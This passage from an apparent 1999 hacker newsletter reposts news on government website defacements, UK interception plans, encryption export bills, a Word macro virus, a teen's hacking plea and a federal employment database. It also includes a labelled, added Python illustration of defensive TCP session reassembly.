      One major problem vendors are struggling with in producing this type of solution
      is the large number of "false positives" -- incorrectly perceived attacks -- that
      are generated when a network is scanned, Wood said. Despite this, a
      commercially viable solution could be available within the next year, he said.

      "It's certainly worthwhile that someone like the GSA is driving this; it's
      absolutely necessary," Wood said. "Perhaps this will help coordinate the industry
      so that they will provide something sooner than they would have."

      The need for this type of solution across government has been underscored by
      the more than 40 federal World Wide Web sites that have been hacked in the
      last two months, including at least six last week. And these attacks are only the
      most noticeable types of intrusions into government networks, according to
      federal experts testifying before Congress last week [see related story, "House
      member suggests regular network security reports"].

      However, in the end, while many would wish otherwise, keeping up with
      attackers instead of one step behind really is the best that anyone can do, Jarrell
      said. "There is no silver bullet; there is no perfect solution when it comes to
      intrusion detection," he said. "As I've said before, if you build a better
      mousetrap, a better mouse will evolve." 

      
      @HWA
      
      
 10.0 Nasa servers reportedly hacked
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      From http://www.newsbytes.com/pubNews/132718.html
      
      30 Jun 1999, 10:51 AM CST
      By David McGuire, Newsbytes.
      MINNEAPOLIS, MINNESOTA, U.S.A., 

      In what appears to be the third computer attack on
      a government Website this week, crackers may
      have gained unauthorized access to one or more
      National Aeronautics and Space Administration (NASA)
      servers yesterday. 

      "There is some indication that a couple servers at the
      Marshall Space Flight Center in Huntsville, Alabama" were
      attacked earlier this week, a NASA spokesperson told
      Newsbytes today. NASA could not confirm the reports as of
      this writing. 

      The Marshall site was up and running as of 11:00 EDT
      today. 

      While Sunday's hack of the US Army's home page typifies
      the kind of high-profile attack favored by many hacker (more
      accurately known as cracker) groups, the apparent Marshall
      attack and yesterday's crack of National Oceanic and
      Atmospheric Administration's (NOAA) Norman, Okla.-based
      Storm Prediction Center are more puzzling, Newsbytes
      notes. 

      Marshall is a fairly low-profile NASA center that focuses
      primarily on research in the areas of astronomy, low gravity,
      and space shuttle propulsion. The Storm Prediction Center
      (SPC) provides nationwide weather forecasts. 

      The SPC hack caught NOAA by surprise. "At about three
      AM, some Internet customer called one of our forecasters
      and said 'You better check your Website,'" SPC Director Joe
      Schaefer told Newsbytes yesterday. 

      "We produce weather forecasts for the whole country," he
      said. "We are doing a public good. There is no way I can
      see that we are harming anybody. To come after a site like
      this is strange, to put it mildly." 

      The Army hack was somewhat more typical. At some point
      Sunday night, crackers replaced the Army's home page with
      a page that read "Hello, this Website hack has a purpose.
      The purpose is to settle rumors. Global Hell is alive, Global
      Hell will not die," Lt. Col. Ron Burns of the Army's Director
      for Information Systems Command, Control,
      Communications and Computers (DISC4) unit told
      Newsbytes Monday. 

      Sunday's attack was the first successful crack of the Army's
      main site, located at http://www4.army.mil . 

      The US Senate and Federal Bureau of Investigation (FBI)
      have also suffered recent Website attacks. 

      The FBI declined comment on the string of hacker attacks. 

      Reported by Newsbytes.com, http://www.newsbytes.com . 

      10:51 CST
      Reposted 10:59 CST      
      
      @HWA
      
      
 11.0 UK May Force ISPs to Install Taps 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      June 28th
      
      From HNN http://www.hackernews.com/
      
      contributed by Weld Pond 
      The British Interception of Communications Act has
      been the target of proposed changes recently. The
      changes would require all communications service
      providers to build in, at their expense, capabilities for
      government agents to be able to listen in to
      communications. This proposal is particularly broad as it
      does not stop at the internet and covers everything
      from pagers to video conferencing to VPNs. These new
      requirements have been proposed by the International
      Law Enforcement Telecommunications Seminar
      (ILETS), an exclusive FBI-funded group that meets in
      secret. 

      Tech Web     
      http://www.techweb.com/news/story/TWB19990625S0019
      
      
      U.K. Wants ISPs To Build In
      Interception
      (06/25/99, 3:40 p.m. ET)
      By Duncan Campbell, TechWeb 

      The British government has become the first in
      Europe to openly propose internationally
      agreed requirements for ISPs to build
      technology into networks that would allow for
      police surveillance. 

      Under proposals for changes to the Interception of
      Communications Act announced by the Home Office this
      week, all communications service providers (CSPs)
      would be required to build interception software or
      hardware into their systems. 

      The law -- if passed -- will apply to all types of new
      communications services, including Internet telephony,
      TV conferencing, paging, and satellite based personal
      communications systems. 

      The International User Requirements have been drawn
      up over the past six years by a group founded by the
      U.S. FBI, called the International Law Enforcement
      Telecommunications Seminar (ILETS), which meets in
      secret. The group excludes representatives from industry
      or civil rights organizations, and has attempted to
      standardize its objectives as an International
      Telecommunication Union requirement. 

      According to this week's "white paper," every type of
      network will be covered, including VPNs operated
      through the Internet or other TCP/IP systems. The new
      law will also cover interception of business telecom
      services, ranging from basic networks of a few lines
      found within a small office to large networks linking
      offices, in both the public and private sectors, the
      document says. 

      Under the present British Interception of
      Communications Act, only licensed public telecom
      operators have to provide government tapping facilities
      within their networks. However, ISPs must surrender
      any stored communications data they have, including
      e-mail, Web-access records, and service details, if
      served with an order. 

      Home Secretary Jack Straw now proposes all CSPs be
      required to take reasonable steps to ensure their system
      is capable of being intercepted. 

      "This will be an ongoing requirement CSPs will have to
      consider each time they develop their network or
      introduce new services," Straw said. "CSPs will also be
      required to provide reasonable assistance to effect
      warranted intercepts." 

      This will include real-time access to data about their
      subscribers and information about services they have
      used, including logs of telephone calls, e-mail, or website
      accesses. A key part of technical arrangements to be
      made will ensure operators will not be able to know what
      information has been copied from their systems. 

      The British government said the new law would make
      full provision for human-rights legislation, Straw said. 

      But according to Madeleine Colvin of Justice, the
      international human-rights organization and British
      section of the International Commission of Jurists, the
      proposed law would not achieve this. 

      "There are major gaps in what these proposals suggest
      for controlling surveillance methods. For example, how is
      anyone to know if their human rights may have been
      abused if they are never going to be told that their e-mail
      has been intercepted by the government?" he asked. 

      @HWA
      
 12.0 Crypto Tie Downs Loosened      
      ~~~~~~~~~~~~~~~~~~~~~~~~~
            
      June 28th
      
      From HNN http://www.hackernews.com/
      

      contributed by mortel 
      Bills to loosen the restrictions on exporting strong
      encryption were approved on Thursday by the U.S.
      Senate and House Commerce Committees. The House
      Security and Freedom through Encryption (SAFE) Act
      removes the government restrictions on export of strong
      encryption if a comparable encryption product is
      commercially available outside the U.S. In addition, the
      SAFE Act bars the government from requiring key
      recovery. Yeah! 

      CNN
      http://www.cnn.com/TECH/computing/9906/25/cryptbill.idg/
      
      U.S. committees approve
      encryption bill 

      by Elinor Mills Abreu 


      (IDG) -- The U.S. Senate and House
      Commerce Committees Thursday
      approved bills that would liberalize
      encryption export regulations. In
      addition, the Senate committee
      passed bills calling for the promotion
      of digital signatures and filtering
      software to block pornography. 

      The House Security and Freedom
      through Encryption (SAFE) Act
      removes the government restrictions
      on export of strong encryption if a
      comparable encryption product is
      commercially available outside the
      U.S. In addition, the SAFE Act bars
      the government from requiring key
      recovery, whereby the government
      would have access to keys to decode
      encrypted messages for
      law-enforcement purposes.

      The government argues that it needs
      to control the export of strong
      encryption for national security.
      Vendors argue that the restrictions
      hamper their competitiveness on the worldwide market because strong
      encryption is readily available outside the U.S. The government wants vendors
      to develop encryption software that includes a key recovery mechanism. 

      The amendments approved by the House committee would do several things:
      require that a comparable encryption product be available in a country outside
      the U.S. in order for a U.S. company to export similar technology there; bar
      export to the People's Liberation Army or the Communist Military in China;
      allow the Secretary of Commerce to deny the export of encryption products if
      they would be used to harm national security, to sexually exploit children or to
      execute other illegal activities; require the Secretary of Commerce to consult
      with the secretaries of State and Defense, the Director of Central Intelligence
      and the Attorney General when reviewing a product; and subject a person to
      criminal penalties for not providing access to encrypted data if a subpoena
      were served and the person had the capability to decrypt the data. 

      Meanwhile, Sen. John McCain [R-Ariz.]
      proposed a Senate encryption bill that would
      allow for the exportation of encryption of key
      lengths up to 64 bits. In general, companies
      currently must get a license to export
      encryption higher than 56 bits in key length. 

      In addition, the McCain encryption bill would
      allow for the export of stronger "nondefense"
      encryption to "responsible entities" and
      governments in the North Atlantic Treaty
      Organization, the Association of Southeast
      Asian Nations and the Organization for
      Economic Cooperation and Development.
      However, the Secretary of Commerce would
      be allowed to prohibit export of particular
      encryption products to an individual or
      organization in a foreign country. An
      Encryption Export Advisory Board would be
      created to review applications for exemption
      of encryption of over 64 bits, make
      recommendations to the Secretary of
      Commerce and authorize more funding to law
      enforcement and national security agencies to
      "upgrade facilities and intelligence." The bill
      would ask the National Institute of Standards
      and Technology to establish an advanced
      encryption standard by Jan. 1, 2002. 

      "The bill carefully balances our national security and law enforcement
      interests while updating current laws on encryption technology," McCain said
      in a statement. "It is illogical to deny U.S. producers the ability to compete
      globally if similar products are already being offered by foreign companies." 

      On the digital signature front, Sen. Spencer Abraham [R-Mich.] said the
      Millennium Digital Commerce Act he sponsored would "ensure that individuals
      and organizations in different states are held to their agreements and
      obligations even if their respective states have different rules concerning
      electronically signed documents." 

      The Abraham bill would pre-empt state law from denying that digital contracts
      are legal solely because they are in electronic form; establish guidelines for
      international use of electronic signatures that would remove obstacles to
      electronic transactions; and allow the market to determine the type of
      authentication technology used in international commerce. 

      The Senate Commerce Committee also grappled with Internet censorship by
      approving another McCain-sponsored bill. The plan would require schools and
      libraries receiving government universal service discounts for Internet access
      to use filtering technology on computers children access that would screen out
      pornography. 

      Taking up a less controversial bill, the Senate committee also approved a
      measure to tie cellular phone users calling 911 to medical centers, police and
      firefighters for faster response time to accidents and emergencies. The bill
      would expand the coverage areas of wireless telephone service; establish
      parity of protection for the provision or use of wireless 911 service; and
      upgrade 911 systems so they can provide information such as location and
      automatic crash notification data. 

      Alan Davidson, staff counsel for the Washington, D.C.-based Center for
      Democracy and Technology, said "it was a mixed day for the Internet on
      Capitol Hill." 

      While legislators realize the potential of electronic commerce and favor
      liberalizing encryption export to advance it, they are fearful of what they see
      as the "dark side" of the Internet - content that might be objectionable,
      according to Davidson. 

      Rather than require filtering software in schools and libraries, legislators should
      offer educational institutions the flexibility to choose "acceptable use or
      monitoring policies," he said. 

      "Mandating that every school and library filter access to the Internet is not
      going to be the best way to protect kids," he said. "In addition to the fact that
      the bill has constitutional problems, it mandates one technological approach
      without regard to the more effective ways that local communities are already
      protecting kids." 

      Other committees may review these bills before they go to the floor of the two
      houses for a vote, he said. 

      @HWA
      
      
 13.0 Heathen.A Spreads Through Word Files 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      June 28th
      
      From HNN http://www.hackernews.com/
      
      contributed by nvirb 
      While not intentionally malicious or as fast-spreading as
      Melissa or WormExplorer, Heathen.A is the latest threat to
      computer users. Heathen.A is considered to be a
      multipartite virus and infects only Word97 files. 

      PC World
      http://www.pcworld.com/pcwtoday/article/0,1510,11586,00.html
      
      
      Heathen.A Is at the Gates 

      Keep a lookout: There's a new bug in town.

      by Matthew Nelson, InfoWorld Electric 
      June 25, 1999, 4:50 p.m. PT 

      SAN MATEO, CALIFORNIA -- Network Associates'
      Anti-Virus Emergency Response Team is warning
      users about what it terms a "medium risk" virus called
      Heathen.A.

      Heathen.A is a multipartite virus, as it uses two
      classes of files, an .exe portion and a .doc portion, for
      its infection. The virus was originally spread from a
      newsgroup and replicates itself across Microsoft Word
      97 files, but it does not destroy data.

      "It's delivered if someone receives an e-mail with an
      infected Word 97 document, or if they access any
      server file that is infected," says Allison Taylor, product
      marketing manager for corporate antivirus solutions at
      Network Associates. "It doesn't carry a particular
      payload except for dropping a patch into your
      [Windows] 95/98 shell."

      "It runs a modified version of your Windows Explorer
      system and then infects the Word 97 documents,"
      Taylor explains. "So once you've been infected, any
      Word 97 file that you open from then on will also be
      infected."

      The macro drops three system files, heathen.vex,
      heathen.vdl, and heathen.vdo, into a system's
      C:/Windows subdirectory. When the system is
      rebooted, the heathen.vex file is renamed explorer.exe,
      according to AVERT Labs.

      NAI has assigned the Heathen.A virus a medium-risk
      level as it is not engineered to appear to be coming
      from a known user, and because it infects new
      systems only if a user opens an infected Word 97 file.
      Heathen.A does not send itself through e-mail as
      Melissa and Worm.ExploreZip do.

      NAI has issued a virus update to protect against the
      Heathen.A virus at AVERT Labs' Web site. 

      @HWA
      
 14.0 $950 for a Log File Analysis Tool 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 28th
      
      From HNN http://www.hackernews.com/
      
      contributed by Weld Pond 
      Sandstorm Enterprises has introduced what they are
      calling a TCP/IP Session Reassembler named TCP.demux.
      According to the press release it doesn't seem to be
      more than a glorified grep script. Maybe it is actually
      useful but $950 seems a little steep. 

      Excite News
      http://news.excite.com/news/bw/990623/ma-sandstorm
      
      Sandstorm Enterprises
      http://www.sandstorm.net
      
      Sandstorm Enterprises Introduces TCP.demux, a TCP/IP Session Reassembler; New,
      Efficient Tool for Network-Based Investigations, Auditing, and Reverse Engineering
                                                                                                                  
    
                                                                             Updated 1:34 PM ET June 23, 1999
    
      BOSTON (BUSINESS WIRE) - Sandstorm Enterprises Inc., an information security tools company, has released the first version
      of TCP.demux, a TCP/IP session reconstruction utility. TCP.demux is the first of a set of tools from Sandstorm Enterprises for
      advanced network monitoring and surveillance.
    
      TCP.demux is designed to make network monitors, such as "tcpdump", "snoop", and "Sniffer Basic" more useful. There are so
      many connections over even a medium-sized network that it is often impossible for even a high-end commercial network analyzer
      to present the traffic in a clear, informative way. TCP.demux takes IP streams captured by network monitors, reassembles them
      into their constituent TCP/IP and UDP sessions, and displays the information in a variety of convenient formats. TCP.demux
      includes sophisticated and powerful analysis tools for quick identification of relevant sessions.
    
      Possible uses of TCP.demux include network security, reverse engineering, and network-based software development. It can be
      used to create profiles of suspicious users and to find information being sent unencrypted over a network. It can also help point out
      weaknesses and vulnerabilities in network applications and design. TCP.demux detects and flags anomalies that may be designed
      to interfere with network monitoring.
    
      TCP.demux generates reports in 19 different text or HTML formats. It runs on a wide variety of platforms, including Windows
      95/98/2000/NT and many varieties of UNIX, including RedHat Linux 5.1, NetBSD, OpenBSD, FreeBSD, BSDI, and Solaris.
      TCP.demux can easily be included in batch files, shell scripts, and other applications in any computer language.
    
      The idea of a TCP session reconstruction tool is not new, but all other such tools have been platform-specific and embedded in
      ponderous application suites. "There have been many tools for winnowing through Internet traffic flows, but almost everything to
      date has been scaled or developed for the workgroup environment," says James VanBokkelen, Sandstorm's President and founder.
      "The Internet has grown enormously in the past few years, and with it the scale of the problems. TCP.demux is the first tool we
      know of designed with the scope of today's problems in mind."
    
      Analyzing network traffic with TCP.demux is time-efficient, and therefore cost-efficient. Because dumpfile analysis is separated
      from the capture process, TCP.demux allows remote monitoring of networks. An engineer at one of Sandstorm's beta sites said,
      after TCP.demux had allowed him to isolate problems on a large congested network in under half an hour, "TCP.demux was the
      quickest way to debug the system. Had the debugging process been long, it would have jeopardized our ability to ship on time."
    
      TCP.demux is being offered at the introductory price of $950. Additional information on TCP.demux can be found at
      http://www.sandstorm.net/tcpdemux.
    
      Sandstorm Enterprises, headquartered in Boston, MA, has been acclaimed for its groundbreaking PhoneSweep telephone scanner,
      the first commercial product designed to audit corporate telephone networks for vulnerability to attacks by hackers. See Sandstorm
      Enterprises at the USENIX Security Conference in Washington, D.C. August 25-26. Sandstorm personnel collectively have
      decades of experience in security management, software development, research, education, and consulting. Sandstorm is
      committed to providing trusted, reliable products and excellent technical support. Sandstorm Enterprises is on the web at
      http://www.sandstorm.net. 
    
      PhoneSweep and TCP.demux are trademarks of Sandstorm Enterprises, Inc. 
    
      Contact: Sandstorm Enterprises, Inc. James Van Bokkelen (617) 426-5056 jbvb@sandstorm.net or In Washington, DC: Ross Stapleton-Gray
      rsgray@sandstorm.net or sales@sandstorm.net 
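
      The release describes session reassembly only in outline. As an added
      illustration (not Sandstorm's code and not part of the original article),
      the Python below demultiplexes raw IPv4/TCP packets by flow, reorders them
      by sequence number and flags overlapping segments whose bytes disagree.
      All names, the first-copy-wins overlap policy and the sample packets are
      assumptions constructed for this example.

```python
import struct
from collections import defaultdict

SYN = 0x02

def build_segment(src, sport, dst, dport, seq, payload=b"", flags=0x18):
    """Build a raw IPv4+TCP packet for the demo (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return ip + tcp + payload

def parse_segment(pkt):
    """Return (flow_key, seq, flags, payload), or None if not a whole IPv4/TCP packet."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if ihl < 20 or total_len > len(pkt) or total_len < ihl + 20:
        return None
    sport, dport, seq = struct.unpack("!HHI", pkt[ihl:ihl + 8])
    data_off = (pkt[ihl + 12] >> 4) * 4
    if data_off < 20 or ihl + data_off > total_len:
        return None
    key = (".".join(map(str, pkt[12:16])), sport,
           ".".join(map(str, pkt[16:20])), dport)
    return key, seq, pkt[ihl + 13], pkt[ihl + data_off:total_len]

def seq_offset(seq, base):
    """Signed 32-bit distance from base, so streams crossing 2**32 stay ordered."""
    return ((seq - base + 0x80000000) & 0xFFFFFFFF) - 0x80000000

def reassemble(packets):
    """Group packets into one-directional flows and rebuild each byte stream.

    Returns {flow_key: {"data": bytes, "gaps": [(offset, missing_len)],
                        "conflicts": [(offset, rejected_payload)]}}.
    """
    segments = defaultdict(list)
    for pkt in packets:
        parsed = parse_segment(pkt)
        if parsed:
            key, seq, flags, payload = parsed
            segments[key].append((seq, flags, payload))
    sessions = {}
    for key, segs in segments.items():
        # Offset 0 is the first data byte: ISN+1 if the SYN was captured,
        # otherwise the first segment seen (earlier bytes get negative offsets).
        syn = [seq for seq, flags, _ in segs if flags & SYN]
        base = (syn[0] + 1) & 0xFFFFFFFF if syn else segs[0][0]
        store, conflicts = {}, []
        for seq, flags, payload in segs:
            start = seq_offset(seq, base) + (1 if flags & SYN else 0)
            clash = False
            for i, byte in enumerate(payload):
                kept = store.setdefault(start + i, byte)   # first copy wins
                clash = clash or kept != byte
            if clash:                                      # same offsets, different bytes
                conflicts.append((start, payload))
        offsets = sorted(store)
        gaps = [(a + 1, b - a - 1) for a, b in zip(offsets, offsets[1:]) if b - a > 1]
        sessions[key] = {"data": bytes(store[o] for o in offsets),
                         "gaps": gaps, "conflicts": conflicts}
    return sessions

# Constructed sample capture: two interleaved flows, delivered out of order.
WEB = ("10.0.0.5", 1025, "10.0.0.9", 80)
ECHO = ("10.0.0.7", 1026, "10.0.0.9", 9000)
SAMPLE_PACKETS = [
    build_segment(*WEB, 1000, flags=SYN),
    build_segment(*ECHO, 0, b"WORLD\r\n"),            # seen before the bytes that precede it
    build_segment(*WEB, 1011, b" HTTP/1.0\r\n"),      # out of order
    build_segment(*WEB, 1001, b"GET /index"),
    build_segment(*ECHO, 0xFFFFFFFA, b"HELLO "),      # sequence numbers wrap past 2**32
    build_segment(*WEB, 1001, b"GET /index"),         # plain retransmission
    build_segment(*WEB, 1005, b"/xxxxx"),             # overlap carrying different bytes
    b"\x45\x00",                                      # truncated junk, ignored
]

if __name__ == "__main__":
    for flow, result in reassemble(SAMPLE_PACKETS).items():
        print(flow, result)
```

      A conflicting overlap is worth flagging because the monitor and the
      receiving host may each keep a different copy of the disputed bytes.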
      
      @HWA
      
 15.0 Youth Charged With $20,000 in Damages 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 28th
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Richard223 
      The case of a minor from Chesterfield County Mass,
      made it into a newspaper in Virginia. The youth has
      been charged with breaking into ACIS/BICNet; according
      to court documents, he caused "the entire system to
      crash" which resulted in over $20,000 in damage.
      Evidently the Virginia High Technology Crimes Unit was
      the investigating office since the suspect used one
      Virginia system to route his traffic. 

      Richmond Times Dispatch
      http://gatewayva.com/rtd/dailynews/virginiaarch/hack25.shtml
      
      Chesterfield youth pleads
      guilty to hacking 

      Friday, June 25, 1999

      BY MARK BOWES
      Times-Dispatch Staff Writer 

      A Chesterfield County youth who authorities said is intelligent but committed a
      foolish act has pleaded guilty to hacking into a Massachusetts Internet
      provider's system, disabling it and causing at least $20,000 in damage. 

      The 16-year-old, whose identity is being withheld because of his age, pleaded
      guilty to computer trespassing Monday in Chesterfield Juvenile and Domestic
      Relations District Court. The judge continued the matter until Aug. 12 so he
      can decide whether to convict the boy of a felony, as charged, or reduce it
      to a misdemeanor. 

      Through his attorney, the boy agreed the evidence was sufficient to convict
      him, "but contested whether or not it was maliciously done," which is required
      for a felony conviction, said Assistant Chesterfield Commonwealth's Attorney
      Aubrey M. Davis Jr. 

      "I didn't see it as [a malicious] act," Davis said. "I think it was a foolish act by
      an intelligent kid who didn't really realize the significance of what he was
      doing. He's a pretty daggone smart kid." 

      Virginia State Police Special Agent Sal Girgente, who investigated the case
      here, gave a summary of evidence in court on Monday. 

      According to evidence, the boy, using his mother's Internet account, hacked
      into the computer network of ACIS/BICNet, an Internet service provider in
      Ayer, Mass., in August. State police also believe he succeeded in
      breaking into the computer systems of New Mexico State University and
      Aurora Communications Exchange Ltd., in Ontario, Canada. 

      Investigators believe he may have hacked into the latter two systems to "cover
      his tracks" before breaking into the Internet provider's network. 

      The state police's new High Technology Crimes Unit began investigating the
      case after getting a referral from the FBI's Boston field office. An agent
      there succeeded in tracking an intruder into the ACIS/BICNet system back
      through a Virginia Internet provider to the boy's home in Chester. 

      During an intrusion on Aug. 8, police believe the teen and possibly
      accomplices replaced system files, among other things, created a new account
      and turned off system logging, according to court documents. That caused the
      company's e-mail system to be out of service for 12 hours. 

      Several days later, the intruder again broke into the system and succeeded in
      causing "the entire system to crash," court papers say. The resulting damage,
      police said, topped $20,000. 

      The teen "succeeded in bringing the system to its knees," Girgente said. Three
      FBI traces were successful in leading authorities to the Chesterfield family's
      Internet account. Police believe the boy and other hackers broke into the
      system to play games or create chat rooms. 

                       © 1999, Richmond Newspapers Inc.
      
      @HWA
        
      
 16.0 Army Fights Online Battle And Looses 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 29th
      
      From HNN http://www.hackernews.com/

      contributed by Space Rogue 
      Early Monday morning one of the four web servers
      for the US Army came under attack. The web page
      poked at the FBI and their recent raids of the members
      of the group gH. www4.army.mil was quickly noticed as
      being defaced and was restored by 6am. It is believed
      that the attackers used a highly publicized exploit for
      Cold Fusion, an exploit for which a patch has been
      available for weeks. (Hmmmmm, maybe I should reenlist
      and help them out?) 

      HNN Cracked Pages Archive - Be sure to read the html comments.
      http://www.hackernews.com/archive/crackarch.html
      
      CNN
      http://www.cnn.com/TECH/computing/9906/28/AM-ArmyHacked.ap/
      
      San Jose Mercury News
      http://www.sjmercury.com/svtech/news/breaking/ap/docs/590787l.htm
      
      APB Online
      http://www.apbonline.com/911/1999/06/28/hack0628_01.html
      
      MSNBC
      http://www.msnbc.com/news/284765.asp
      
      Nando Times
      http://www.techserver.com/story/body/0,1634,65142-103297-733898-0,00.html
      
      ZD Net
      http://www.zdnet.com/zdnn/stories/news/0,4586,2285307,00.html
      
      
      CNN;
      
      Hackers attack Army's main Internet site

      June 28, 1999 
      Web posted at: 7:37 PM EDT (2337 GMT) 

      WASHINGTON (AP) -- Computer hackers defaced the Army's main Web
      site in the latest digital attack on a federal system. Pentagon workers noticed it
      early Monday and repaired it. 

      Army spokesman Jim Stueve said administrators believe hackers altered the
      www.army.mil site between 8 p.m. Sunday and 5 a.m. Monday, but no
      internal systems were affected. "There were no security breaches," he said. 

      The altered site announced the attack "has a purpose ... to settle rumors"
      about the demise of the loosely organized hacker group that claimed
      responsibility for the May attack on the White House Web site. 

      Another message hidden within the altered page's computer code urged
      people who saw it to "trust very few people." 

      Stueve said he noticed the defaced page when he arrived for work Monday
      morning. It was replaced by 6 a.m. 

      "I just looked at it and just went on to my favorites (other sites) and blew it off
      because I knew they were going to get to it right away," he said. 

      The attack comes in the wake of several others on prominent government
      Internet sites, including those of the White House, FBI and Senate. Military
      pages have long been favorites of hackers. 

      "They're always the target," said Keith Rhodes, a director in the information
      management division in the General Accounting Office, the investigative
      branch of Congress. "It's almost like a rite of passage. You have to bust a
      (military) site to have any credibility." 

      Just last week, experts told the House Science Committee's technology panel
      that managers at many federal agencies fail to consider computer security
      adequately and have too few employees with sufficient training. 

      Rhodes, who was among those testifying last week, said Monday that the
      Defense Department's computer-security expertise is uneven. 

      "They're the best and the worst in computer security," Rhodes said. "They've
      got some real pros, some of the best in the business. But the DOD is huge ...
      and some of the areas in the Department of Defense don't have very good
      security." 

      Outside security experts said they believed the Army site's attackers used a
      relatively well publicized security loophole in the popular Cold Fusion software
      package. The Army said only that the incident was under investigation. 

      "The community of attackers is getting better at what they do, and a lot of
      their tools are getting automated," Rhodes said. "And a lot of the software
      being sent out is getting worse -- designed for flash with security as an
      afterthought. You put up your Web site, and it gets creamed." 
      
      @HWA
      
      
 17.0 Welfare Reform Law Invades Privacy of US Citizens 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 29th
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Weld Pond 
      The Personal Responsibility and Work Opportunity
      Reconciliation Act of 1996 was primarily passed to
      reform the welfare system in the United States. One of
      the little known provisions of this law is that employers
      must report all new hires and salary changes to the
      government on a quarterly basis; this information
      eventually makes its way to the Administration for
      Children and Families. Starting next month the program
      will require banks to search for accounts on people
      determined to be delinquent on their child-support
      payments. (Ed Note: This is an eye opening article and
      is recommended. It is long and the good stuff is at the
      bottom.) 

      The Charlotte Observer
      http://www.charlotte.com/click/wiretech/pub/009020.htm
      
      Posted at 7:45 p.m. EDT Saturday, June 26, 1999 

      Huge new electronic `dragnet'
      assailed by privacy advocates
     
                         By ROBERT O'HARROW JR.
                            The Washington Post 
     
      WASHINGTON -- As part of a new and aggressive effort to track down parents
      who owe child support, the federal government has created a vast computerized
      data-monitoring system that includes all individuals with new jobs and the names,
      addresses, Social Security numbers and wages of nearly every working adult in
      the United States.
     
      Government agencies have long gathered personal information for specific
      reasons, such as collecting taxes. But never before have federal officials had the
      legal authority and technological ability to locate so many Americans found to be
      delinquent parents -- or such potential to keep tabs on Americans accused of
      nothing.
     
      The system was established under a little-known part of the law overhauling
      welfare three years ago. It calls for all employers to quickly file reports on every
      person they hire and, quarterly, the wages of every worker. States regularly must
      report all people seeking unemployment benefits and all child-support cases.
     
      Starting next month, the system will reach further. Large banks and other
      financial institutions will be obligated to search for data about delinquent parents
      by name on behalf of the government, providing authorities with details about
      bank accounts, money-market mutual funds and other holdings of those parents.
      State officials, meanwhile, have sharply expanded the use of Social Security
      numbers. Congress ordered the officials to obtain the nine-digit numbers when
      issuing licenses -- such as drivers', doctors' and outdoorsmen's -- in order to
      revoke the licenses of delinquents.
     
      Enforcement officials say the coupling of computer technology with details about
      individuals' employment and financial holdings will give them an unparalleled
      ability to identify and locate parents who owe child support and, when necessary,
      withhold money from their paychecks or freeze their financial assets.
     
      ``They never get away from us anymore. It's just wonderful. . . . What you're
      trying to do in child support is build a box, four walls, around a person,'' said
      Brian Shea, the acting executive director of child-support enforcement in
      Maryland. ``It has in some ways revolutionized this business.''
     
      But privacy experts and civil libertarians say the scope of the effort raises new
      questions about the proper line between aggressive public policy and intrusive
      government snooping. In pursuing an objective that is almost universally
      applauded, the government has also created something that many Americans
      have staunchly opposed: a vast pool of fresh personal information that could be
      used in a variety of ways to monitor their lives.
     
      ``What you have here is a compilation of information that is much better and more
      current than any other data system in the U.S.,'' said Robert Gellman, an
      attorney and privacy specialist in Washington, D.C. ``All of the sudden we're on
      the verge of creating the Holy Grail of data collection, a central file on every
      American.''
     
      Already lawmakers, federal agencies and the White House have considered
      expanding the permitted aims of the system to include pinpointing debtors, such
      as students who default on government loans.
     
      Under the system, every employer must send information about new hires and
      quarterly wages to state child-support agencies. State officials gather the data,
      along with information on unemployment benefits and child-support cases, and
      then ship it to computers run by the Administration for Children and Families.
      ACF officials then use computers to sort and send back to state authorities
      reports about people obligated to pay child support.
     
      Government officials say the system is safe, accurate and discreet. They also
      say it is secure. Because it has, among other safeguards, systems that confirm
      the accuracy of Social Security numbers, officials say it will not intrude into the
      lives of most people.
     
      An examination of the program, however, shows that government officials have
      downplayed or overlooked a variety of privacy and security concerns as they
      worked to meet congressional deadlines.
     
      The computer system that houses much of the data at the Social Security
      Administration ``has known weaknesses in the security of its information
      systems,'' according to a Dec. 31 report by the General Accounting Office. And
      authorities have not studied the frequency of mistakes that might arise from
      incorrect data, even though the system will enable local child-support
      enforcement officials to routinely freeze a parent's assets without an additional
      court hearing.
     
      Few people know about the system, even though it was created through one of
      the signature acts of Congress and the Clinton administration -- the ``Personal
      Responsibility and Work Opportunity Reconciliation Act of 1996,'' the law that
      ended the federal guarantee of welfare payments. Much of the congressional
      debate and news coverage at the time focused on the broad policy and political
      implications of the new law.
     
      Officials have not publicized their ability to obtain financial information because
      they do not want to alert delinquents to the ability of enforcement workers to
      seize or freeze financial assets, according to Michael Kharfen, spokesman for the
      federal Administration for Children and Families, which administers the program.
     
      -0-
     
      When welfare reformers on Capitol Hill and the White House approved the system
      in 1996, their aim was to cut down welfare spending by boosting child-support
      payments.
     
      They had in mind people such as Stephanie Dudley and her son, Robert, who live
      in Farmington, Minn. Robert's father had split up with Dudley shortly after the boy
      was born and drifted from place to place. He owed $350 a month in child-support
      payments, but it was hard tracking him down and getting him to pay.
     
      Officials found Robert's father -- and then started withholding money from his
      paycheck -- after a new employer in Pennsylvania reported him to the network. ``I
      literally was living from check to check,'' Dudley said. ``I mean, that money
      literally put shoes on the kids' feet, helped pay the rent.''
     
      Kathy Robins of Tazewell, Va., and her 7-year-old son, Dwight, never received
      court-ordered child support until the system turned up his father in North Carolina.
      Now she gets about $120 a month, money she plans to use to pay for a
      babysitter this summer. ``It'll help,'' she said. ``I mean, it's better than I was
      getting before, which was nothing.''
     
      Child-support advocates contend that fears about privacy are overblown when
